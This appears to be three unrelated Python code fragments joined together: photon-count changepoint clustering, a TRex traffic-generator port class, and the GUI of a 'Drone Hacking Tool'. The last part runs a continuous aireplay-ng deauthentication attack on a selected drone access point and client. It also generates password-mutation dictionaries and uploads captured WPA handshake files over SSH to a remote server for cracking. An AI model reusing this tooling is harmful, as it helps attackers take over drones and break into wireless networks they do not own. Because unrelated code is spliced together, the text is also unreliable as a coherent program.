(1) initial hierarchical clustering - InitialClustering
(2) with that clustering as input, Bayesian Inf. Crit. based clustering into m-levels
'''
# import approxpoissondpf
import numpy as np
import numpy.matlib
import matplotlib.pyplot as plt
from scipy.stats import poisson
import pandas as pd
def Grouping(segmentlengths, segmentcounts, mingroups, maxgroups):
'''
input
segmentlengths : the lengths of the CPA segments
segmentcounts : the nr of counts in each CPA segment
mingroups : the minimum nr of groups to test for
maxgroups : the maximum nr of groups to test for
output
groupingdata : the nr of states and their likelihoods with 2 different methods from Watkins & Young
mlikely_tot : most likely trajectory though the states
psummarry : the likelihood of drawing a certain state, given m states. This is in TIME occupancy, not NUMBER occupancy (see definition of pm)
'''
initialcluster = InitialClustering(segmentlengths, segmentcounts, plot=False)
Schw = np.zeros([maxgroups, 2])
psummarry = np.zeros([maxgroups, maxgroups])
mlst = np.arange(mingroups,maxgroups+1) # nr of levels under test
mlikely_tot = np.zeros((maxgroups, len(segmentlengths)), dtype=int)
for mgroups in mlst:
(pm, Im, Tm, mlikely, schwartz, pmj) = ExpectationMaximizationClustering(segmentlengths, segmentcounts, mgroups, initialcluster[mgroups-1])
Schw[mgroups-mingroups] = schwartz
mlikely_tot[mgroups-1] = mlikely
psummarry[mgroups-1, 0:mgroups] = pm
groupingdata = {'mlst':mlst, 'Schw0':Schw[:,0], 'Schw1':Schw[:,1]}
groupingdata = pd.DataFrame(groupingdata)
cols =['mlst', 'Schw0', 'Schw1']
groupingdata = groupingdata[cols]
return groupingdata, mlikely_tot, psummarry
def ApproxPoissPDF(k, mu):
logpdf=k*np.log(mu)-mu-(k*np.log(k)-k+0.5*np.log(2*np.pi*k))
idx = np.where(k==0)
for i in idx:
logpdf[i] = np.log(poisson.pmf(0,mu[i]))
pdf = np.exp(logpdf)
return (pdf, logpdf)
def ClusterOnce(TG, NG, assignment):
'''
This function finds the two most similar segments in an array and clusters them into one state
TG: jumplengths
NG: rNlevels
'''
# note that my meshgrids start at zero. Need to add 1 to get other indexing
[Tm, Tj] = np.meshgrid(TG, TG)
[Nm, Nj] = np.meshgrid(NG, NG)
[m, j] = np.meshgrid(np.arange(len(NG)), np.arange(len(NG)))
m = m+1
j = j+1
#should this be Mmj or Mjm?
Mmj = (Nm+Nj)*np.log((Nm+Nj)/(Tm+Tj)) - (Nm)*np.log((Nm/Tm))-(Nj)*np.log((Nj/Tj)); # Eq 11
idx = np.where(np.ndarray.flatten(np.triu(m,1),'F')>0)[0] # not the same as Femius' idx, but Python indexes start at 0
winner_idx = np.argmax(np.ndarray.flatten(Mmj)[idx]) # take all nonzero elements of Mmj above the diagonal (which is a vector), and find the index of the largest one
hitpair = np.unravel_index(idx[winner_idx], np.shape(Mmj)) # put this index back into 2d shape
hitpair = sorted(hitpair)
# combine most similar entries by adding the lengths and the counts
TG[hitpair[0]] = TG[hitpair[0]]+TG[hitpair[1]] # Eq 12
NG[hitpair[0]] = NG[hitpair[0]]+NG[hitpair[1]] # Eq 13
# delete the entry that was squeezed into mlist
TG = np.delete(TG, hitpair[1])
NG = np.delete(NG, hitpair[1])
idx = np.where(assignment==hitpair[1])
assignment[idx] = hitpair[0]
idx = np.where(assignment>hitpair[1])
assignment[idx] = assignment[idx]-1
return (hitpair, TG, NG, assignment)
def InitialClustering(TG, NG, plot=False):
'''
This function takes a list of segment times and counts, and clusters them together sequentially until there is only one state
The output is used as an initial guess for the clustering defiend by Watkins & Yang (J. Phys. Chem. B 2005, 109, 617-628)
This function is a lot faster than InitialClustering()
TG : lengths of the jump segments
NG : number of counts in the jump segments
'''
sublen = 300
intermediatestop = 30
tg2 = []
ng2 = []
hierarchyassignment2 =[]
N_sublen = int(np.ceil(len(TG)/sublen))
hierarchyassignment = np.zeros([len(NG)+1, len(NG)], dtype=int) # columns are nr of iterations, rows are segment nr
hierarchyassignment[0] = np.arange(len(NG))
if len(TG) > sublen:
# =============================================================================
# Divide the time series into sub-lengths and partially cluster
# =============================================================================
for i in range(N_sublen):
# divide into sub-lengths
tg2.append(TG[i*sublen:i*sublen+sublen])
ng2.append(NG[i*sublen:i*sublen+sublen])
hierarchyassignment2.append(hierarchyassignment[:,i*sublen:(i+1)*sublen])
# set the assignments to start staggered
# not strictly necessary, but makes for pretty pictures
hierarchyassignment2[i] = hierarchyassignment2[i]%sublen + i*intermediatestop
# do the clustering until you have intermediatestop levels
p = 0
while len(ng2[i]) > intermediatestop:
(hitpair, tg2[i], ng2[i], assignment) = ClusterOnce(tg2[i], ng2[i], hierarchyassignment2[i][p].copy())
hierarchyassignment2[i][p+1] = assignment
p = p+1
# roll last array so the most recently clustered rows line up
last_elemwidth = np.shape(hierarchyassignment2[-1])[1]
if last_elemwidth < sublen:
if last_elemwidth <= intermediatestop:
rollby = sublen - intermediatestop
if last_elemwidth > intermediatestop:
rollby = sublen-last_elemwidth
hierarchyassignment2[-1] = np.roll(hierarchyassignment2[-1], rollby, axis=0)
# recombine the sub-lengths
hierarchyassignment = np.concatenate(hierarchyassignment2, axis=1)
TG = np.concatenate(tg2)
NG = np.concatenate(ng2)
p = sublen - intermediatestop
else:
p=0
# =============================================================================
# Cluster all the way down
# =============================================================================
while len(NG) > 1:
(hitpair, TG, NG, assignment) = ClusterOnce(TG, NG, hierarchyassignment[p].copy())
hierarchyassignment[p+1] = assignment
p = p+1
lastiteration = np.where(np.sum(hierarchyassignment, axis=1)==0)[0][0]
hierarchyassignment = hierarchyassignment[:lastiteration+1]
if plot:
fig, ax = plt.subplots()
ax.imshow(hierarchyassignment)
ax.set_xlabel('changepoint segment')
ax.set_ylabel('clustering iteration')
ax.set_title('Initial clustering - Fast')
hierarchyassignment = np.flipud(hierarchyassignment)
return hierarchyassignment
def ExpectationMaximizationClustering(TG, NG, mgroups, initialassignment, printupdates=True):
'''
This function takes a list of segment times and counts and their inital assignment/clustering (the latter is created by InitialClusteringFast() or InitialClustering())
It follows the clustering as described by Watkins & Yang (J. Phys. Chem. B 2005, 109, 617-628)
TG : lengths of the jump segments
NG : number of counts in the jump segments
initialassignment: the initial clustering
'''
Ttotal=np.sum(TG);
ncp=len(TG);
ntotal=np.sum(NG);
pmj = np.zeros([mgroups, len(NG)])
# initialize - eqn 14
for m in range(mgroups):
pmj[m] = 1.0*(initialassignment==m)
success=0
qq=0
qqmax=200 # max nr of iterations
logLKlast=1
tolerance = 1E-8
'''start of Figure 9, Watkins & Yang'''
while success==0:
qq = qq+1
# M-step
Tm = np.matmul(pmj, TG) # list of total durations of segments
Mn = np.matmul(pmj, NG) # list of total counts in segments
Im = Mn/Tm # list of intensities in segments
pm = Tm/Ttotal # probability of drawing an Ij number from the mth intensity level
pmjnew = np.zeros([mgroups, len(NG)])
# E-step
for m in range(mgroups):
pmjnew[m] = pm[m]*ApproxPoissPDF(NG, TG*Im[m])[0]
# check for tricky ones so you don't divide by zero
idx = np.where(np.sum(pmjnew,axis=0)==0.) # find columns that add to zero
# divide out the nontricky ones, dummy operation for the tricky ones
denom=np.matlib.repmat(np.sum(pmjnew, axis=0),mgroups, 1);
denom[:,idx]=denom[:,idx]+1.0
pmjnew=pmjnew/denom
# original version, causes and catches warning:
# pmjnew=pmjnew/np.matlib.repmat(np.sum(pmjnew, axis=0),mgroups, 1)
# now we could have a bunch of NaN ones. We set those to the previous iteration's value
# pmjnew[:,idx] = pmj[:,idx]
'''stop criterion
from J Phys Chem B 123, 689: If Wastkins Eqn 15 of Watkins hardly changes, you have converged'''
logLK = np.zeros(np.shape(pmj))
for m in range(mgroups):
[g, logg] = ApproxPoissPDF(NG, TG*Im[m])
logLK[m] = np.log(pm[m]) + logg # not pmjnew?
logLK = np.sum(pmj*logLK)
if qq>2:
if abs(logLK/logLKlast-1)<tolerance:
success = 1
if qq==qqmax:
success = 1
if printupdates:
print('terminated before full convergence at m='+str(mgroups))
logLKlast = logLK
pmj = pmjnew
'''End of Figure 9'''
# now sort all the levels in order of intensity
if mgroups > 1:
inds = (-pm).argsort()
pm = pm[inds]
Tm = Tm[inds]
Im = Im[inds]
pmj = pmj[inds]
# since you have m groups, the most likely trajectory is
# pmjlikely = np.amax(pmj, axis=0)
mlikely = np.argmax(pmj, axis=0)
# if you only have one level
else:
mlikely = np.zeros(len(NG), dtype=int)
# pmjlikely = pmj
# the log likelyhood of the data given this trace is
# Eq 15 of Watkins & Yang
[g, logg] = ApproxPoissPDF(NG, TG*Im[mlikely])
logLKv1 = np.log(pm[mlikely])+logg
#alternatively take Eq 15 to the letter
logLK = np.zeros([mgroups,len(NG)])
for m in range(mgroups):
[g, logg] = ApproxPoissPDF(NG, TG*Im[m])
logLK[m] = np.log(pm[m]) + logg
logLKv2 = np.sum(pmj*logLK)
# Now use this as input for eqn 16
# to accomodate the weird sentence 8 lines below Eq 16, calculate the reduced number of CPs
ncp = 1+len(np.where(np.diff(mlikely)!=0)[0])
schwarz1 = np.sum(logLKv1)*2 - (2*mgroups-1)*np.log(ncp) - ncp*np.log(ntotal)
schwarz2 = np.sum(logLKv2)*2 - (2*mgroups-1)*np.log(ncp) - ncp*np.log(ntotal)
schwartz = [schwarz1, schwarz2]
return | |
<gh_stars>0
from collections import namedtuple, OrderedDict
from .trex_stl_packet_builder_scapy import STLPktBuilder
from .trex_stl_streams import STLStream
from .trex_stl_types import *
from .rx_services.trex_stl_rx_service_ipv6 import *
from . import trex_stl_stats
from .utils.constants import FLOW_CTRL_DICT_REVERSED
from .utils.common import list_difference, list_intersect
import base64
from copy import deepcopy
from datetime import datetime, timedelta
import threading
StreamOnPort = namedtuple('StreamOnPort', ['compiled_stream', 'metadata'])
########## utlity ############
def mult_to_factor (mult, max_bps_l2, max_pps, line_util):
if mult['type'] == 'raw':
return mult['value']
if mult['type'] == 'bps':
return mult['value'] / max_bps_l2
if mult['type'] == 'pps':
return mult['value'] / max_pps
if mult['type'] == 'percentage':
return mult['value'] / line_util
# describes a single port
class Port(object):
STATE_DOWN = 0
STATE_IDLE = 1
STATE_STREAMS = 2
STATE_TX = 3
STATE_PAUSE = 4
STATE_PCAP_TX = 5
MASK_ALL = ((1 << 64) - 1)
PortState = namedtuple('PortState', ['state_id', 'state_name'])
STATES_MAP = {STATE_DOWN: "DOWN",
STATE_IDLE: "IDLE",
STATE_STREAMS: "IDLE",
STATE_TX: "TRANSMITTING",
STATE_PAUSE: "PAUSE",
STATE_PCAP_TX : "TRANSMITTING"}
def __init__ (self, port_id, user, rpc, session_id, info):
self.port_id = port_id
self.state = self.STATE_IDLE
self.service_mode = False
self.handler = None
self.rpc = rpc
self.transmit = rpc.transmit
self.transmit_batch = rpc.transmit_batch
self.user = user
self.info = dict(info)
self.streams = {}
self.profile = None
self.session_id = session_id
self.status = {}
self.port_stats = trex_stl_stats.CPortStats(self)
self.next_available_id = 1
self.tx_stopped_ts = None
self.has_rx_streams = False
self.owner = ''
self.last_factor_type = None
self.__attr = {}
self.attr_lock = threading.Lock()
# decorator to verify port is up
def up(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_up():
return port.err("{0} - port is down".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
# owned
def owned(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_acquired():
return port.err("{0} - port is not owned".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
# decorator to check server is readable (port not down and etc.)
def writeable(func):
def func_wrapper(*args, **kwargs):
port = args[0]
if not port.is_acquired():
return port.err("{0} - port is not owned".format(func.__name__))
if not port.is_writeable():
return port.err("{0} - port is active, please stop the port before executing command".format(func.__name__))
return func(*args, **kwargs)
return func_wrapper
def err(self, msg):
return RC_ERR("Port {0} : *** {1}".format(self.port_id, msg))
def ok(self, data = ""):
return RC_OK(data)
def get_speed_bps (self):
return (self.get_speed_gbps() * 1000 * 1000 * 1000)
def get_speed_gbps (self):
return self.__attr['speed']
def is_acquired(self):
return (self.handler != None)
def is_up (self):
return self.__attr['link']['up']
def is_active(self):
return (self.state == self.STATE_TX ) or (self.state == self.STATE_PAUSE) or (self.state == self.STATE_PCAP_TX)
def is_transmitting (self):
return (self.state == self.STATE_TX) or (self.state == self.STATE_PCAP_TX)
def is_paused (self):
return (self.state == self.STATE_PAUSE)
def is_writeable (self):
# operations on port can be done on state idle or state streams
return ((self.state == self.STATE_IDLE) or (self.state == self.STATE_STREAMS))
def get_owner (self):
if self.is_acquired():
return self.user
else:
return self.owner
def __allocate_stream_id (self):
id = self.next_available_id
self.next_available_id += 1
return id
# take the port
def acquire(self, force = False, sync_streams = True):
params = {"port_id": self.port_id,
"user": self.user,
"session_id": self.session_id,
"force": force}
rc = self.transmit("acquire", params)
if not rc:
return self.err(rc.err())
self.handler = rc.data()
if sync_streams:
return self.sync_streams()
else:
return self.ok()
# sync all the streams with the server
def sync_streams (self):
self.streams = {}
params = {"port_id": self.port_id}
rc = self.transmit("get_all_streams", params)
if rc.bad():
return self.err(rc.err())
for k, v in rc.data()['streams'].items():
self.streams[int(k)] = STLStream.from_json(v)
return self.ok()
# release the port
def release(self):
params = {"port_id": self.port_id,
"handler": self.handler}
rc = self.transmit("release", params)
if rc.good():
self.handler = None
self.owner = ''
return self.ok()
else:
return self.err(rc.err())
def sync(self):
params = {"port_id": self.port_id}
rc = self.transmit("get_port_status", params)
if rc.bad():
return self.err(rc.err())
# sync the port
port_state = rc.data()['state']
if port_state == "DOWN":
self.state = self.STATE_DOWN
elif port_state == "IDLE":
self.state = self.STATE_IDLE
elif port_state == "STREAMS":
self.state = self.STATE_STREAMS
elif port_state == "TX":
self.state = self.STATE_TX
elif port_state == "PAUSE":
self.state = self.STATE_PAUSE
elif port_state == "PCAP_TX":
self.state = self.STATE_PCAP_TX
else:
raise Exception("port {0}: bad state received from server '{1}'".format(self.port_id, port_state))
self.owner = rc.data()['owner']
self.next_available_id = int(rc.data()['max_stream_id']) + 1
self.status = rc.data()
# replace the attributes in a thread safe manner
self.set_ts_attr(rc.data()['attr'])
self.service_mode = rc.data()['service']
return self.ok()
# add streams
@writeable
def add_streams (self, streams_list):
# listify
streams_list = listify(streams_list)
lookup = {}
# allocate IDs
for stream in streams_list:
# allocate stream id
stream_id = stream.get_id() if stream.get_id() is not None else self.__allocate_stream_id()
if stream_id in self.streams:
return self.err('Stream ID: {0} already exists'.format(stream_id))
# name
name = stream.get_name() if stream.get_name() is not None else id(stream)
if name in lookup:
return self.err("multiple streams with duplicate name: '{0}'".format(name))
lookup[name] = stream_id
batch = []
for stream in streams_list:
name = stream.get_name() if stream.get_name() is not None else id(stream)
stream_id = lookup[name]
next_id = -1
next = stream.get_next()
if next:
if not next in lookup:
return self.err("stream dependency error - unable to find '{0}'".format(next))
next_id = lookup[next]
stream_json = stream.to_json()
stream_json['next_stream_id'] = next_id
params = {"handler": self.handler,
"port_id": self.port_id,
"stream_id": stream_id,
"stream": stream_json}
cmd = RpcCmdData('add_stream', params, 'core')
batch.append(cmd)
rc = self.transmit_batch(batch)
ret = RC()
for i, single_rc in enumerate(rc):
if single_rc.rc:
stream_id = batch[i].params['stream_id']
self.streams[stream_id] = streams_list[i].clone()
ret.add(RC_OK(data = stream_id))
self.has_rx_streams = self.has_rx_streams or streams_list[i].has_flow_stats()
else:
ret.add(RC(*single_rc))
self.state = self.STATE_STREAMS if (len(self.streams) > 0) else self.STATE_IDLE
return ret if ret else self.err(str(ret))
# remove stream from port
@writeable
def remove_streams (self, stream_id_list):
# single element to list
stream_id_list = listify(stream_id_list)
# verify existance
not_found = list_difference(stream_id_list, self.streams)
found = list_intersect(stream_id_list, self.streams)
batch = []
for stream_id in found:
params = {"handler": self.handler,
"port_id": self.port_id,
"stream_id": stream_id}
cmd = RpcCmdData('remove_stream', params, 'core')
batch.append(cmd)
if batch:
rc = self.transmit_batch(batch)
for i, single_rc in enumerate(rc):
if single_rc:
id = batch[i].params['stream_id']
del self.streams[id]
self.state = self.STATE_STREAMS if (len(self.streams) > 0) else self.STATE_IDLE
# recheck if any RX stats streams present on the port
self.has_rx_streams = any([stream.has_flow_stats() for stream in self.streams.values()])
# did the batch send fail ?
if not rc:
return self.err(rc.err())
# partially succeeded ?
return self.err("stream(s) {0} do not exist".format(not_found)) if not_found else self.ok()
# remove all the streams
@writeable
def remove_all_streams (self):
params = {"handler": self.handler,
"port_id": self.port_id}
rc = self.transmit("remove_all_streams", params)
if not rc:
return self.err(rc.err())
self.streams = {}
self.state = self.STATE_IDLE
self.has_rx_streams = False
return self.ok()
# get a specific stream
def get_stream (self, stream_id):
if stream_id in self.streams:
return self.streams[stream_id]
else:
return None
def get_all_streams (self):
return self.streams
@writeable
def start (self, mul, duration, force, mask, start_at_ts = 0):
if self.state == self.STATE_IDLE:
return self.err("unable to start traffic - no streams attached to port")
params = {"handler": self.handler,
"port_id": self.port_id,
"mul": mul,
"duration": duration,
"force": force,
"core_mask": mask if mask is not None else self.MASK_ALL,
'start_at_ts': start_at_ts}
# must set this before to avoid race with the async response
last_state = self.state
self.state = self.STATE_TX
rc = self.transmit("start_traffic", params)
if rc.bad():
self.state = last_state
return self.err(rc.err())
# save this for TUI
self.last_factor_type = mul['type']
return rc
# stop traffic
# with force ignores the cached state and sends the command
@owned
def stop (self, force = False):
# if not is not active and not force - go back
if not self.is_active() and not force:
return self.ok()
params = {"handler": self.handler,
"port_id": self.port_id}
rc = self.transmit("stop_traffic", params)
if rc.bad():
return self.err(rc.err())
self.state = self.STATE_STREAMS
self.last_factor_type = None
# timestamp for last tx
self.tx_stopped_ts = datetime.now()
return self.ok()
# return True if port has any stream configured with RX stats
def has_rx_enabled (self):
return self.has_rx_streams
# return true if rx_delay_ms has passed since the last port stop
def has_rx_delay_expired (self, rx_delay_ms):
assert(self.has_rx_enabled())
# if active - it's not safe to remove RX filters
if self.is_active():
return False
# either no timestamp present or time has already passed
return not self.tx_stopped_ts or (datetime.now() - self.tx_stopped_ts) > timedelta(milliseconds = rx_delay_ms)
@writeable
def remove_rx_filters (self):
assert(self.has_rx_enabled())
if self.state == self.STATE_IDLE:
return self.ok()
params = {"handler": self.handler,
"port_id": self.port_id}
rc = self.transmit("remove_rx_filters", params)
if rc.bad():
return self.err(rc.err())
return self.ok()
@writeable
def set_l2_mode (self, | |
self.ssh_port_label_ssh_port_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.ssh_user_name_label_ssh_user_name_inputbox_frame = tk.Frame(self)
self.ssh_user_name_label_ssh_user_name_inputbox_frame.config(background = "white")
self.ssh_user_name_label = tk.Label(self.ssh_user_name_label_ssh_user_name_inputbox_frame, background = "white", text = "SSH user name: ", font = self.controller.label_font)
self.ssh_user_name_label.pack(side = "left", anchor = "w")
self.ssh_user_name_inputbox = tk.Entry(self.ssh_user_name_label_ssh_user_name_inputbox_frame, background = "white", font = self.controller.label_font)
self.ssh_user_name_inputbox.pack(fill = "x")
self.ssh_user_name_label_ssh_user_name_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.ssh_user_password_label_ssh_user_password_inputbox_frame = tk.Frame(self)
self.ssh_user_password_label_ssh_user_password_inputbox_frame.config(background = "white")
self.ssh_user_password_label = tk.Label(self.ssh_user_password_label_ssh_user_password_inputbox_frame, background = "white", text = "SSH user password: ", font = self.controller.label_font)
self.ssh_user_password_label.pack(side = "left", anchor = "w")
self.ssh_user_password_inputbox = tk.Entry(self.ssh_user_password_label_ssh_user_password_inputbox_frame, background = "white", font = self.controller.label_font)
self.ssh_user_password_inputbox.pack(fill = "x")
self.ssh_user_password_label_ssh_user_password_inputbox_frame.pack(side = "top", fill = "both", pady = 10)
self.footer_frame = tk.Frame(self)
self.footer_frame.config(background = "white")
self.progressbar = ttk.Progressbar(self.footer_frame, style="green.Horizontal.TProgressbar", orient = "horizontal", mode = "indeterminate")
self.progressbar.pack(side = "top", fill = "x")
self.info_label = tk.Label(self.footer_frame, background = "white", text = "Ready.", font = self.controller.info_font)
self.info_label.pack(side = "left", anchor = "sw", pady = 5)
try:
self.start_button_icon = tk.PhotoImage(file = current_path + "/data/gui_img/start_icon.png")
self.start_button = tk.Button(self.footer_frame, background = "white", text = "Start", image = self.start_button_icon, compound = "left",
command = lambda: self.check_user_input())
self.start_button.pack(side = "right", anchor = "se")
except: #If icon not found
self.start_button = tk.Button(self.footer_frame, background = "white", text = "Start",
command = lambda: self.check_user_input())
self.start_button.pack(side = "right", anchor = "se")
self.footer_frame.pack(side = "bottom", fill = "both")
def menubar(self, tool):
menubar = tk.Menu(tool)
option_tool = tk.Menu(menubar, tearoff = 0)
option_tool.add_command(label = "Home", command = lambda: quit(), state="disable")
option_tool.add_separator()
option_tool.add_command(label = "Exit", command = lambda: quit(), state="disable")
menubar.add_cascade(label = "Option", menu = option_tool)
help_tool = tk.Menu(menubar, tearoff = 0)
help_tool.add_command(label = "Page guide", command = lambda: messagebox.showinfo("Page Guide",
"Crack the password through the remote server to improve the effectiveness of cracking a password.\n\nTo enjoy the faster password cracking effectiveness, please type in the remote server login information."))
help_tool.add_command(label = "About", command = lambda: messagebox.showinfo("Drone Hacking Tool",
"Code name: Barbary lion\nVersion: 1.1.2.111\n\nGroup member:\n<NAME>\n<NAME>\nDicky SHEK"))
menubar.add_cascade(label = "Help", menu = help_tool)
return menubar
def check_user_input(self):
self.get_user_type_in_ssh_ip = self.ssh_ip_inputbox.get()
self.get_user_type_in_ssh_port = self.ssh_port_inputbox.get()
self.get_user_type_in_ssh_user_name = self.ssh_user_name_inputbox.get()
self.get_user_type_in_ssh_user_password = self.ssh_user_password_inputbox.get()
if self.get_user_type_in_ssh_ip == "" or self.get_user_type_in_ssh_port == "" or self.get_user_type_in_ssh_user_name == "" or self.get_user_type_in_ssh_user_password == "":
messagebox.showerror("Error", "You must fill in all the fields.")
elif self.get_user_type_in_ssh_ip != "" or self.get_user_type_in_ssh_port != "" or self.get_user_type_in_ssh_user_name != "" or self.get_user_type_in_ssh_user_password != "":
try:
ipaddress.ip_address(self.get_user_type_in_ssh_ip)
try:
self.get_user_type_in_ssh_port_int = int(self.get_user_type_in_ssh_port)
if self.get_user_type_in_ssh_port_int < 0 or self.get_user_type_in_ssh_port_int > 65353:
if messagebox.showerror("Error", "Invalid port number."):
self.ssh_port_inputbox.delete(0, "end") #Clear inputbox string
else:
self.ssh_ip_inputbox.config(state = "disable")
self.ssh_port_inputbox.config(state = "disable")
self.ssh_user_name_inputbox.config(state = "disable")
self.ssh_user_password_inputbox.config(state = "disable")
self.progressbar.start()
self.info_label.config(text = "Please wait.")
self.start_button.config(state = "disable")
threading.Thread(target = self.four_way_handshake_file_validation()).start()
except ValueError:
self.progressbar.stop()
if messagebox.showerror("Error", "Invalid port number."):
self.ssh_port_inputbox.delete(0, "end") #Clear inputbox string
except ValueError:
if messagebox.showerror("Error", "Invalid IP address."):
self.ssh_ip_inputbox.delete(0, "end") #Clear inputbox string
def four_way_handshake_file_validation(self):
self.check_four_way_handshake_convert_file = Path(four_way_handshake_convert_file)
if self.check_four_way_handshake_convert_file.is_file(): #Check "check_four_way_handshake_convert_file" is really exist
self.four_way_handshake_file_localpath = four_way_handshake_convert_file
self.four_way_handshake_convert_filename = self.four_way_handshake_file_localpath.replace(current_path + "/handshake/hashcat_convert_file/", '')
self.four_way_handshake_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + self.four_way_handshake_convert_filename
try:
if cracked_password_output != "":
self.info_label.config(text = "Waiting for user select.")
if messagebox.askyesno("Create password dictionary", "Would you like to create a password dictionary to improve the effective of cracking password?"):
self.info_label.config(text = "Generating a password dictionary file.")
#password_dictionary_path_timestamp = time.strftime("%Y%m%d-%H%M%S") #Create a timestamp
password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
changed_password_generator.passwordInsert(cracked_password_output, password_dictionary_path, True) #True is enable two insert
changed_password_generator.oneChange(cracked_password_output, password_dictionary_path)
changed_password_generator.twoChange(cracked_password_output, password_dictionary_path)
changed_password_generator.oneInsertoneChange(cracked_password_output, password_dictionary_path)
self.password_dictionary_file_localpath = password_dictionary_path
self.password_dictionary_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
self.password_dictionary_filename = selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
self.password_dictionary = True
remote_server_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp
self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist
target_BSSID_log = [selected_bssid]
channel_log = [selected_channel]
privacy_log = [selected_privacy]
password_log = [<PASSWORD>]
manufacturer_log = [matched_manufacturer]
client_BSSID_log = [selected_ap_client]
remote_server_timestamp_log = [remote_server_timestamp]
states_log = ["BSSID: " + selected_bssid + " password dictionary created. File save at:" + password_dictionary_path]
dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log})
dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv"
else:
self.password_dictionary = False
else:
pass
except NameError:
pass
threading.Thread(target = self.ssh_connect).start()
else: #Handshake file not found or missing
try:
get_four_way_handshake_convert_file = filedialog.askopenfilename(initialdir = current_path + "/handshake/hashcat_convert_file/", filetypes = [('hccapx files', '.hccapx')], title = "Select File")
#print(get_four_way_handshake_convert_file)
if get_four_way_handshake_convert_file == "":
self.progressbar.stop()
if messagebox.showerror("Error", "You must select one file."):
self.ssh_ip_inputbox.config(state = "normal")
self.ssh_port_inputbox.config(state = "normal")
self.ssh_user_name_inputbox.config(state = "normal")
self.ssh_user_password_inputbox.config(state = "normal")
self.start_button.config(state = "normal")
else:
self.four_way_handshake_file_localpath = get_four_way_handshake_convert_file
self.four_way_handshake_convert_filename = get_four_way_handshake_convert_file.replace(current_path + "/handshake/hashcat_convert_file/", '')
self.four_way_handshake_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + self.four_way_handshake_convert_filename
try:
if cracked_password_output != "":
self.info_label.config(text = "Waiting for user select.")
if messagebox.askyesno("Create password dictionary", "Would you like to create a password dictionary to improve the effective of cracking password?"):
self.info_label.config(text = "Generating a password dictionary file.")
#password_dictionary_path_timestamp = time.strftime("%Y/%m/%d-%H%M%S") #Create a timestamp
password_dictionary_path = current_path + "/handshake/password_dictionary/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
changed_password_generator.passwordInsert(cracked_password_output, password_dictionary_path, True) #True is enable two insert
changed_password_generator.oneChange(cracked_password_output, password_dictionary_path)
changed_password_generator.twoChange(cracked_password_output, password_dictionary_path)
changed_password_generator.oneInsertoneChange(cracked_password_output, password_dictionary_path)
self.password_dictionary_file_localpath = password_dictionary_path
self.password_dictionary_file_remotepath = "/home/" + self.get_user_type_in_ssh_user_name + "/" + selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
self.password_dictionary_filename = selected_bssid + "_" + four_way_handshake_file_timestamp + "_dictionary" + ".txt"
self.password_dictionary = True
remote_server_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp
self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist
target_BSSID_log = [selected_bssid]
channel_log = [selected_channel]
privacy_log = [selected_privacy]
password_log = [<PASSWORD>]
manufacturer_log = [matched_manufacturer]
client_BSSID_log = [selected_ap_client]
remote_server_timestamp_log = [remote_server_timestamp]
states_log = ["BSSID: " + selected_bssid + " password dictionary created. File save at:" + password_dictionary_path]
dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log, "timestamp":remote_server_timestamp_log, "states":states_log})
dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ",", mode = "a", header = False) #Write log data to "drone_attack_log.csv"
else:
self.password_dictionary = False
else:
pass
except NameError:
pass
threading.Thread(target = self.ssh_connect).start()
except AttributeError:
self.progressbar.stop()
if messagebox.showerror("Error", "You must select one file."):
self.ssh_ip_inputbox.config(state = "normal")
self.ssh_port_inputbox.config(state = "normal")
self.ssh_user_name_inputbox.config(state = "normal")
self.ssh_user_password_inputbox.config(state = "normal")
self.start_button.config(state = "normal")
def ssh_connect(self):
if messagebox.askyesno("Wi-Fi Deauthentication", "Would you like to keep running deauthentication attack to prevent the client reconnect to the drone?"):
deauth_info = "echo " + sudo_password + " | sudo -S xterm -iconic -T 'deauthinfo' -hold -e 'aireplay-ng --deauth 0 -a " + selected_bssid + " -c " + selected_ap_client + " " + selected_interface + "'"
subprocess.Popen(deauth_info, stdout = subprocess.PIPE, shell = True)
self.wifi_deauthentication_states = True
try:
self.info_label.config(text = "Connecting to the target SSH server.")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(self.get_user_type_in_ssh_ip, self.get_user_type_in_ssh_port, self.get_user_type_in_ssh_user_name, self.get_user_type_in_ssh_user_password, timeout = 10)
try:
self.info_label.config(text = "Transmission file to the target SSH server.")
sftp = client.open_sftp()
sftp.put(self.four_way_handshake_file_localpath, self.four_way_handshake_file_remotepath)
if self.password_dictionary == True:
sftp.put(self.password_dictionary_file_localpath, self.password_dictionary_file_remotepath)
self.info_label.config(text = "Successfully uploaded.")
except OSError:
self.progressbar.stop()
self.info_label.config(text = "Upload failed.")
messagebox.showerror("Error", "Failed to transmission file to the target SSH server.")
